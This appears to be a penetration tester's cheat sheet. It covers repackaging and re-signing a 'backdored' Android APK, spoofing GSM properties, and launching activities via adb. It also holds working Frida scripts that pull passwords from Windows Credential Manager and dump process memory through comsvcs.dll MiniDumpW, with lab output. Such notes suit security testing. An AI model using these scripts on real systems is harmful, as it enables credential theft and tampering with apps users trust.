Basic tips

Getting certificate details from an apk

keytool -printcert -jarfile file.apk
(this prints the certificate behind the v1/JAR signature only; for APKs signed with the v2/v3 scheme use `apksigner verify --print-certs file.apk`)

apktool - decode and compile APK

java -jar .\apktool.jar decode -r 'C:\tmp\xxxxx.apk'
(inside the decompiled APK (root))
java -jar ..\apktool.jar build -o c:\tmp\new.apk C:\Tools\android\apk_folder
I: Using Apktool 2.5.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Copying raw resources...
I: Copying libs... (/lib)
I: Copying libs... (/kotlin)
I: Copying libs... (/META-INF/services)
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...
PS C:\Tools\android\>

Create a keystore and signing key (the transcript uses -keysize 2040; 2048 bits or more is the conventional minimum for an RSA signing key)

cd C:\Program Files\Java\jre1.8.0_251\bin
keytool.exe -genkey -v -keystore c:\tmp\.keystore -keyalg RSA -keysize 2040 -validity 365 -alias baws
(...)
Generating 2,040 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 365 days
for: CN=123, OU=123, O=123, L=123, ST=123, C=123
[Storing c:\tmp\.keystore]

Sign apk with jarsigner

Here you need to use the alias created together with the keystore (baws, in this case). Note that jarsigner only produces a v1 (JAR) signature: Android 11+ refuses to install v1-only APKs that target API 30 or higher, and the SHA1 algorithms below are only needed for very old Android versions. For a recent target, prefer `apksigner sign --ks C:\tmp\.keystore --ks-key-alias baws new.apk`, which adds the v2/v3 signature (and then zipalign must run *before* signing, see below).
cd C:\Program Files\AdoptOpenJDK\jdk-11.0.11.9-hotspot\bin
jarsigner.exe -sigalg SHA1withRSA -digestalg SHA1 c:\tmp\new.apk baws -keystore C:\tmp\.keystore
(...)
Enter Passphrase for keystore:
jar signed.
Warning:
The signer's certificate is self-signed.

Align APK to avoid errors

After signing an APK, if you get an error such as "Failed to extract native libraries, res=-2", you probably need to align the APK: native libraries must be stored uncompressed and page-aligned inside the archive, which is what `zipalign -p` enforces.
.\adb.exe install C:\tmp\backdored.apk
Performing Streamed Install
adb: failed to install C:\tmp\backdored.apk: Failure [INSTALL_FAILED_INVALID_APK: Failed to extract native libraries, res=-2]
Attention: You must use zipalign at one of two specific points in the app building process, depending on the app signing tool you use:
  • If you use apksigner, only run zipalign before signing the apk file. If you sign your APK using apksigner and make other changes to the APK, the signature will be invalidated.
  • If you use jarsigner, only run zipalign after signing the APK file.
As I used jarsigner, my last step is to align the APK after signing (check the result with `zipalign -c -v 4 backdored-aligned.apk`) and then install the *aligned* file:
zipalign -p -f -v 4 backdored.apk backdored-aligned.apk
--now--
.\adb.exe install C:\tmp\backdored-aligned.apk

Execute target activity via ADB

First, find the package name in AndroidManifest.xml: it is the `package` attribute of the root `<manifest>` element, on the first line of the file (`<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest ... package="com.x.x.x.x" ...`).
Next, pick a target activity: its class is the `android:name` attribute of the `<activity>` element (e.g. `android:name="com.x.x.com.x.v2.ui.dashboard.DashboardActivity"`; a value starting with `.` is relative to the package name). `am start` takes the form `<package>/<fully qualified activity class>`.
😇
.\adb.exe shell am start com.xxx.xxx.xxx/com.xxx.xxx.v2.ui.dashboard.DashboardActivity

Spoof GSM operator properties (setprop on gsm.* needs a root shell, e.g. an emulator after `adb root`)

adb shell
setprop gsm.operator.numeric 64304
setprop gsm.sim.operator.numeric 64304
setprop gsm.sim.operator.alpha target
setprop gsm.operator.alpha target
setprop gsm.sim.operator.iso-country us
setprop gsm.operator.iso-country us
--validate--
getprop |grep gsm

Frida: enumerate the current user's stored credentials (Windows Credential Manager)

Release Frida 14.2.18 · frida/frida
GitHub
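// Frida (Windows) helper: enumerate the Credential Manager entries visible to
// the injected process via advapi32!CredEnumerateW and hex-dump each raw
// CREDENTIALW structure.
//
// credname: optional filter string passed as CredEnumerate's Filter argument
//           (wildcards such as "teste*" are allowed); undefined enumerates all.
//
// Only credentials readable from the injected process's logon session are
// returned. The dump is the raw struct — its string members are pointers, so
// the secret itself is not shown here; see the CredEnumerateA variant below
// for field decoding.
function EnumerateGenericCredentials(credname){
    const CredEnumerate_ptr = Module.getExportByName("advapi32", "CredEnumerateW");
    // BOOL CredEnumerateW(LPCWSTR Filter, DWORD Flags, DWORD *Count, PCREDENTIALW **Credential)
    // The return value is a BOOL, not a pointer (the original declared "pointer").
    const CredEnumerate = new NativeFunction(CredEnumerate_ptr, "int", ["pointer", "uint32", "pointer", "pointer"]);
    // void CredFree(PVOID Buffer) — releases the array CredEnumerate allocated.
    const CredFree = new NativeFunction(Module.getExportByName("advapi32", "CredFree"), "void", ["pointer"]);

    const filter = credname ? Memory.allocUtf16String(credname) : NULL;
    const count = Memory.alloc(4);                          // DWORD out-param
    const pCredentials = Memory.alloc(Process.pointerSize); // PCREDENTIALW* out-param
    const ret = CredEnumerate(filter, 0, count, pCredentials);
    if (!ret) {
        // Also fails with ERROR_NOT_FOUND when the filter matches nothing.
        console.log("CredEnumerateW failed (no matching credentials, or access denied)");
        return;
    }

    const n = count.readU32();
    // The out-param receives a pointer to an array of CREDENTIALW*; the original
    // indexed the out-param itself, which reads past its 8-byte allocation.
    const creds = pCredentials.readPointer();
    console.log(`Enumerate complete! Found ${n} entries.`);
    try {
        // sizeof(CREDENTIALW) is 80 bytes on x64 and 52 on x86; dumping a fixed
        // 256 bytes over-reads into adjacent heap memory.
        const structSize = Process.pointerSize === 8 ? 80 : 52;
        for (let i = 0; i < n; i++) {
            const curr = creds.add(i * Process.pointerSize).readPointer();
            console.log(curr.readByteArray(structSize));
        }
    } finally {
        CredFree(creds);
    }
}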
[Remote::c:\windows\system32\cmd.exe]-> EnumerateGenericCredentials()
Enumerate complete! Found 1 entries.
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 18 41 e0 1c 37 02 00 00 00 00 00 00 02 00 00 00 .A..7...........
00000010 70 41 e0 1c 37 02 00 00 00 00 00 00 00 00 00 00 pA..7...........
00000020 a8 78 32 15 34 6c d7 01 00 00 00 00 00 00 00 00 .x2.4l..........
00000030 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 ................
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050 7e 41 e0 1c 37 02 00 00 00 00 00 00 00 00 00 00 ~A..7...........
00000060 74 00 65 00 73 00 74 00 65 00 31 00 00 00 75 00 t.e.s.t.e.1...u.
00000070 73 00 65 00 72 00 31 00 00 00 00 00 00 00 00 00 s.e.r.1.........
00000080 00 00 00 00 00 00 00 00 1e 88 b1 e6 00 12 00 80 ................
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
---2nd example---
[Remote::c:\windows\system32\cmd.exe]-> EnumerateGenericCredentials()
Enumerate complete! Found 2 entries. pCredentials=0x1f3e83c2470
Credentials at 0x1f3e6184310 ret: 0x1
teste1:user1:null
Credentials at 0x1f3e6184378 ret: 0x1
teste2:user2:pass2
---------------------------------------------
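// Frida (Windows) helper: enumerate Credential Manager entries via
// advapi32!CredEnumerateA and print "target:user:password" for each one.
//
// credname: optional Filter string (wildcard "*" allowed, e.g. "teste*");
//           undefined enumerates everything the caller is allowed to read.
//
// Field offsets are those of CREDENTIALA for the injected process's bitness
// (80-byte struct on x64, 52-byte struct on x86), derived from
// Process.pointerSize instead of the x64-only constants of the original.
//
// NOTE(review): CredentialBlob is an opaque byte array. Passwords written by
// cmdkey/Windows are UTF-16 without a NUL terminator, which is what the output
// on this page shows, but other writers may store arbitrary bytes — treat the
// decoded string as best-effort.
function EnumerateGenericCredentials(credname){
    const CredEnumerate_ptr = Module.getExportByName("advapi32", "CredEnumerateA");
    // BOOL CredEnumerateA(LPCSTR Filter, DWORD Flags, DWORD *Count, PCREDENTIALA **Credential)
    const CredEnumerate = new NativeFunction(CredEnumerate_ptr, "int", ["pointer", "uint32", "pointer", "pointer"]);
    // void CredFree(PVOID Buffer) — the array returned by CredEnumerate must be freed.
    const CredFree = new NativeFunction(Module.getExportByName("advapi32", "CredFree"), "void", ["pointer"]);

    // CREDENTIALA layout with p = pointer size:
    //   Flags@0, Type@4, TargetName@8, Comment@8+p, LastWritten(FILETIME)@8+2p,
    //   CredentialBlobSize@16+2p, CredentialBlob@16+3p (pointer-aligned),
    //   Persist@16+4p, AttributeCount@20+4p, Attributes@24+4p,
    //   TargetAlias@24+5p, UserName@24+6p.
    const p = Process.pointerSize;
    const OFF_TARGET_NAME = 8;
    const OFF_BLOB_SIZE = 16 + 2 * p;
    const OFF_BLOB = 16 + 3 * p;
    const OFF_USER_NAME = 24 + 6 * p;

    const filter = credname ? Memory.allocAnsiString(credname) : NULL;
    const count = Memory.alloc(4);      // DWORD out-param
    const pCredentials = Memory.alloc(p); // PCREDENTIALA* out-param
    const ret = CredEnumerate(filter, 0, count, pCredentials);
    if (!ret) {
        console.log("ret is false!");
        return;
    }

    const n = count.readU32();
    const creds = pCredentials.readPointer(); // PCREDENTIALA[]
    console.log(`Enumerate complete! Found ${n} entries. pCredentials=${pCredentials}`);
    try {
        for (let i = 0; i < n; i++) {
            const curr = creds.add(i * p).readPointer();
            console.log(`Credentials at ${curr} ret: ${ret}`);
            // String members may be NULL; Frida's read*String yields null for a
            // NULL pointer (hence "teste1:user1:null" in the sample output).
            const targetname = curr.add(OFF_TARGET_NAME).readPointer().readAnsiString();
            const username = curr.add(OFF_USER_NAME).readPointer().readAnsiString();
            const size = curr.add(OFF_BLOB_SIZE).readU32();
            const blob = curr.add(OFF_BLOB).readPointer();
            // Bound the read by CredentialBlobSize: the blob is not NUL-terminated,
            // so an unbounded readUtf16String() would run into adjacent heap memory.
            const password = (size === 0 || blob.isNull())
                ? null
                : blob.readUtf16String(Math.floor(size / 2));
            console.log(`${targetname}:${username}:${password}`);
        }
    } finally {
        CredFree(creds);
    }
}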
--3rd example--- (uses a GetGenericCredentials(name) helper built on advapi32!CredReadA, which is not reproduced on this page)
[Remote::c:\windows\system32\cmd.exe]-> GetGenericCredentials("teste2")
CredReadA is 0x7ffdd7e44e90
Credentials at 0x1f3e83c23e0 ret: 0x1
user2:pass2

Frida minidump via comsvcs.dll MiniDumpW - Windows

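// Frida (Windows) helper: write a full memory dump of process `pid` to
// `dumpname` through comsvcs.dll's undocumented export MiniDumpW — the
// "rundll32 comsvcs.dll MiniDump" technique driven from inside the injected
// process instead of via rundll32.
//
// pid:      target process id (positive integer).
// dumpname: output path. MiniDumpW splits its single string argument on
//           whitespace, so a path containing spaces is not supported here.
//
// NOTE(review): the injected process needs sufficient rights on the target
// (SeDebugPrivilege for other users' or protected processes); MiniDumpW gives
// no return value, so confirm the file exists afterwards. This comsvcs.dll
// pattern is widely signatured by AV/EDR.
function MiniDump(pid, dumpname){
    if (!Number.isInteger(pid) || pid <= 0) {
        throw new Error(`MiniDump: pid must be a positive integer, got ${pid}`);
    }
    if (typeof dumpname !== "string" || dumpname.length === 0 || /\s/.test(dumpname)) {
        throw new Error("MiniDump: dumpname must be a non-empty path without whitespace");
    }

    // HMODULE LoadLibraryW(LPCWSTR) — the handle is pointer-sized, not an int.
    const LoadLibraryW_ptr = Module.getExportByName("kernel32", "LoadLibraryW");
    const LoadLibraryW = new NativeFunction(LoadLibraryW_ptr, "pointer", ["pointer"]);
    const hComsvcs = LoadLibraryW(Memory.allocUtf16String("comsvcs.dll"));
    if (hComsvcs.isNull()) {
        throw new Error("MiniDump: LoadLibraryW(comsvcs.dll) failed");
    }

    // void MiniDumpW(DWORD unused, DWORD unused, PWCHAR "<pid> <path> full")
    // (informally documented signature; the export has no useful return value).
    const MiniDumpW_ptr = Module.getExportByName("comsvcs", "MiniDumpW");
    const MiniDumpW = new NativeFunction(MiniDumpW_ptr, "void", ["uint32", "uint32", "pointer"]);

    const cmd = `${pid} ${dumpname} full`;
    console.log(`Running MiniDump(${cmd})`);
    MiniDumpW(0, 0, Memory.allocUtf16String(cmd));
}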
[Remote::c:\windows\system32\cmd.exe]-> MiniDump(108, "c:\\Users\\user\\Desktop\\dump.asd")

Drozer: Android App enumeration

adb install drozer-agent-2.x.x.apk
drozer console connect --server 192.168.0.10
Start the embedded server in the drozer agent app on the device first (or run `adb forward tcp:31415 tcp:31415` and connect without `--server`). Basic commands below:
Drozer Tutorial
HackTricks